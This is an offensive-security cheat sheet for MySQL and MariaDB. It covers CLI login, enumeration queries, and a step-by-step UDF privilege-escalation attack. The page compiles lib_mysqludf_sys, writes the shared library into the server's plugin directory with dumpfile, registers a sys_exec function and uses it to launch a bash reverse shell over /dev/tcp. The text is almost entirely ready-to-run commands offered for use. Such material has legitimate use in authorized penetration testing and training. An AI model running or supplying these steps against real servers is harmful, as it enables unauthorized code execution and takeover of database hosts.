MySQL / MariaDB

Basic CLI syntax:

$ mysql -h 127.0.0.1 -P 3306 -u snovvcrash -p'Passw0rd!' -e 'show databases;'

Basic enumeration:

mysql> show GRANTS;
mysql> select @@hostname, @@tmpdir, @@version, @@version_compile_machine, @@plugin_dir;

UDF PrivEsc

Install dependencies:

$ sudo apt install libmariadbclient-dev -y
$ git clone https://github.com/mysqludf/lib_mysqludf_sys && cd lib_mysqludf_sys

Compile .so library (x86 example):

$ sudo apt install libc6-dev-i386 -y
$ gcc lib_mysqludf_sys.c -o lib_mysqludf_sys_x86.so -m32 -Wl,--hash-style=both -fPIC -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/server/private -I. -shared -L/usr/lib/x86_64-linux-gnu/libstdc++.so.6

Compile .so library (x64 example):

$ gcc lib_mysqludf_sys.c -o lib_mysqludf_sys_x64.so -m64 -Wl,--hash-style=both -fPIC -Wall -I/usr/include/mariadb/server -I/usr/include/mariadb/server/private -I. -shared -L/usr/lib/x86_64-linux-gnu/libstdc++.so.6

Convert library to hex:

$ xxd -p lib_mysqludf_sys.so | tr -d '\n'

Load library and call user-defined sys_exec function with a rev-shell.

MySQL (x86 example):

mysql> use mysql;
mysql> create table pwn(line blob);
mysql> insert into pwn values(load_file('/tmp/lib_mysqludf_sys_x86.so'));
mysql> select * from pwn into dumpfile '/usr/lib/lib_mysqludf_sys_x86.so';

Or load it from hex:
mysql> set @pwn = '7F..00';
mysql> select unhex(@pwn) into dumpfile '/usr/lib/lib_mysqludf_sys_x86.so';

mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys_x86.so';
mysql> select sys_exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'");

MariaDB (x64 example):

MariaDB> show variables like '%plugin%';  # get lib path
MariaDB> use mysql;
MariaDB> create table pwn(line blob);
MariaDB> insert into pwn values(load_file('/tmp/lib_mysqludf_sys_x64.so'));
MariaDB> select * from pwn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_x64.so';

Or load it from hex:
MariaDB> set @pwn = 0x7F..00;
MariaDB> select binary @pwn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys_x64.so';

MariaDB> create function sys_exec returns integer soname 'lib_mysqludf_sys_x64.so';
MariaDB> select sys_exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'");

Last updated 3 years ago